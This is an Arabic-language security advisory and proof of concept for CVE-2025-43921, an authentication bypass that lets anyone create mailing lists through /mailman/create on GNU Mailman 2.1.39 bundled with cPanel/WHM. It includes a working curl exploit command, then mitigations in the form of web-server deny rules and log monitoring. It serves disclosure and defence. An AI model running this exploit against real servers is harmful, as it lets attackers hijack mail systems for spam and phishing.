
إثبات المفهوم للاستغلال وتحليل فني لـ CVE-2025-43921، وهو تجاوز للمصادقة في GNU Mailman 2.1.39 يسمح بإنشاء قوائم بريدية دون مصادقة عبر نقطة النهاية /mailman/create.
اكتشف بواسطة: Firudin Davudzada & Musazada Aydan
تاريخ الإفصاح: أبريل 2025
معرف CVE: CVE-2025-43921
الخطورة: 5.3 متوسطة (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
نوع الهجوم: عن بُعد
البرنامج المتأثر: GNU Mailman 2.1.39 (مضمن مع cPanel/WHM)
GNU Mailman 2.1.39، كما هو مضمن مع cPanel و WHM، عرضة لثغرة تجاوز المصادقة تسمح للمهاجمين غير المصادق عليهم بإنشاء قوائم بريدية عبر نقطة النهاية /mailman/create. تنشأ المشكلة من غياب ضوابط الوصول في نص create CGI، مما يمكن المهاجمين من إساءة استخدام نظام البريد للبريد العشوائي، أو التصيد، أو استنزاف الموارد.
تتوافق هذه الثغرة مع مشاكل ضوابط الوصول التاريخية في Mailman، مثل أذونات إدارة القائمة غير الصحيحة في Postorius. يمكن ربطها مع CVE-2025-43920 لتصعيد التأثير، مما يخلق منصة لهجمات أوسع.
create CGI (يعالج طلبات إنشاء القائمة)Mailman/Handlers/ (منطق إدارة القائمة)/mailman/create، مما يسمح بإنشاء قوائم عشوائية.يقوم الأمر التالي بإنشاء قائمة بريدية باسم hacked:
curl http://target/mailman/create -d "listname=hacked&[email protected]&password=1234&confirm=1234"
النتيجة المتوقعة: يتم إنشاء قائمة بريدية جديدة، يمكن التحكم بها عن طريق البريد الإلكتروني للمالك الذي يحدده المهاجم.
/mailman/create مع معاملات مصممة لإنشاء قوائم بريدية.حظر الوصول إلى نقطة النهاية: قم بتكوين خادم الويب لتقييد الوصول إلى /mailman/create:
location /mailman/create {
deny all;
return 403;
}
أو لـ Apache:
<Location "/mailman/create">
Deny from all
</Location>
مراقبة السجلات: تحقق من محاولات إنشاء قوائم غير مصرح بها:
tail -f /var/log/mailman/* | grep "newlist"
/mailman/create لمنع إساءة الاستخدام.قام Firudin Davudzada و Musazada Aydan بالإفصاح المسؤول عن هذه الثغرة أثناء مشاركة في اختبار اختراق مصرح به. شكر لفريق MITRE CVE للتنسيق.
البريد الإلكتروني: [email protected]\